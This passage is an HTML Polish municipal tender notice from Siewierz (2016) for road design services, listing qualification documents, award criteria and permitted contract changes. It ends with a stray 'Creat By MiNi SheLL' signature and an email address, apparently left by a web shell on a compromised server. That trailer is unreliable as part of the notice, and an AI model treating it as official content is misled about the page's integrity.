w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im inne, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	jednym projektantem posiadającym uprawnienia do projektowania bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych lub odpowiadające im inne, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W celu oceny spełniania przez Wykonawcę warunku  Zamawiający żąda:
a)	Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami, wg załącznika nr 5 do SIWZ,
b)	Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, wg załącznika nr 5A do SIWZ.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać w wykazie usługi obejmujące należyte wykonanie co najmniej dwóch  projektów budowy, rozbudowy, przebudowy lub remontu drogi o długości minimum 900 m każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty wg zał. Nr 1 do SIWZ.
2.	Pełnomocnictwo do reprezentowania w postępowaniu, jeżeli oferta będzie podpisana przez osobę (y) upoważnioną(e) lub w przypadku występowania podmiotów wspólnie w trybie art.23 ustawy Prawo zamówień publicznych.
3.	Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych, wg zał. Nr 2 do SIWZ.
4.	Potwierdzenie wniesienia wadium.
5.	Oświadczenie, że Wykonawca należy/ nie należy do grupy kapitałowej wraz z listą  podmiotów należących do tej samej grupy kapitałowej zgodnie  z zapisem art. 24 ust. 2 pkt 5 ustawy, wg zał. Nr 6 do SIWZ.
Oferta podmiotów występujących wspólnie:
1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie spółki cywilnej, konsorcjum, porozumienia zawartego między podmiotami). Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem).
2.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
3.	W przypadku wspólnego ubiegania się o zamówienie każdy z wykonawców musi wykazać, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 Ustawy, w tym celu każdy z Wykonawców składających wspólną ofertę powinien złożyć osobno dokumenty wymienione w pkt III.4.2) oraz III.4.4).
Udział podmiotów trzecich:
1.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od  charakteru prawnego  łączących go z nim stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać m.in.: dane po zwalające na identyfikację stron, zakres udostępnienia (np: w zakresie wiedzy i doświadczenia , potencjału technicznego), cel i czas udostępnienia.
2.	W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów 
w stopniu niezbędnym dla należytego wykonania  zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów Zamawiający może żądać od wykonawcy dokumentów dotyczących w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian w umowie w następującym zakresie: 
1)	Przedłużenie terminu wykonania przedmiotu umowy (aneks terminowy), które może nastąpić w następujących przypadkach:
a)	nie wynikające z winy Wykonawcy i niemożliwe do przewidzenia w chwili zawarcia umowy zdarzenia t.j. wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy - termin wykonania przedmiotu umowy może zostać wydłużony o czas trwania w/w okoliczności,
b)	niezawinione przez Wykonawcę opóźnienia ze strony organów  w wydawaniu uzgodnień, opinii i decyzji administracyjnych, konieczność dokonania zmian w dokumentacji w trakcie projektowania w przypadku wniesienia uwag przez mieszkańców gestorów sieci bądź inne podmioty, zmiany w przepisach prawnych powodujące konieczność pozyskania nieprzewidzianych wcześniej uzgodnień, opinii i innych dokumentów niezbędnych dla prawidłowej realizacji inwestycji - termin wykonania przedmiotu umowy może zostać wydłużony o okres zwłoki organu,
c)	wydłużające się czynności geodezyjne z powodów niezależnych od Wykonawcy - termin wykonania przedmiotu umowy może zostać wydłużony o czas trwania w/w okoliczności,
d)	przekroczenie przez Zamawiającego terminu 3 tygodni na zaakceptowanie wstępnej wersji projektu bądź wniesienia do niego uwag po tym terminie - termin wykonania przedmiotu umowy może zostać przedłużony odpowiednio o okres zwłoki Zamawiającego.
e)	wystąpienie prac projektowych dodatkowych, niezbędnych do realizacji zakresu podstawowego.
2)	Zmiana stawki podatku od towarów i usług, z tym, że kwota brutto wynagrodzenia należna Wykonawcy nie może ulec podwyższeniu, a ewentualna zmiana będzie dotyczyła stawki podatku i kwoty netto wynagrodzenia,
3)	Zmiana projektanta wskazanego w ofercie na pisemny wniosek Wykonawcy lub Zamawiającego w przypadku:
a)	śmierci, choroby lub innych niezależnych zdarzeń losowych wskazanych osób,
b)	nie wywiązywania się w/w osób z obowiązków wynikających z umowy,
c)	jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np.: rezygnacji).
W przypadku zmiany nowa osoba musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia.
4)	Dokonanie zmiany w zakresie przedmiotu umowy lub aktualizacji rozwiązań projektowych z uwagi na zmiany technologiczne w zakresie robót budowlanych bądź zmiany obowiązujących przepisów prawa.
5)	Konieczność wprowadzenia do zakresu przedmiotu umowy ewentualnych opracowań dodatkowych lub rozwiązań zamiennych, w szczególności wynikających z zaistniałych na etapie projektowania nieprzewidzianych uwarunkowań technicznych lub formalno-prawnych, których nie można było przewidzieć w chwili zawarcia umowy. 
6)	Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy z celu jednoznacznej interpretacji jej zapisów przez strony.
Do każdej propozycji zmiany, inicjujący zmianę przedstawi opis propozycji zmiany, w tym wpływ na terminy wykonania oraz uzasadnienie zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siewierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Siewierz, ul. Żwirki i Wigury 16, 42-470 Siewierz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy Siewierz, ul. Żwirki i Wigury 16, 42-470 Siewierz - Sekretariat (pokój 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje: przeprowadzenia aukcji elektronicznej, ustanowienia dynamicznego systemu zakupów, zwrotu kosztów udziału w postępowaniu, zawarcia umowy ramowej, udzielania zaliczek na poczet wykonania zamówienia, oraz nie przewiduje ograniczeń ubiegania się o zamówienie publiczne wynikających z art. 29 ust. 4 ustawy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com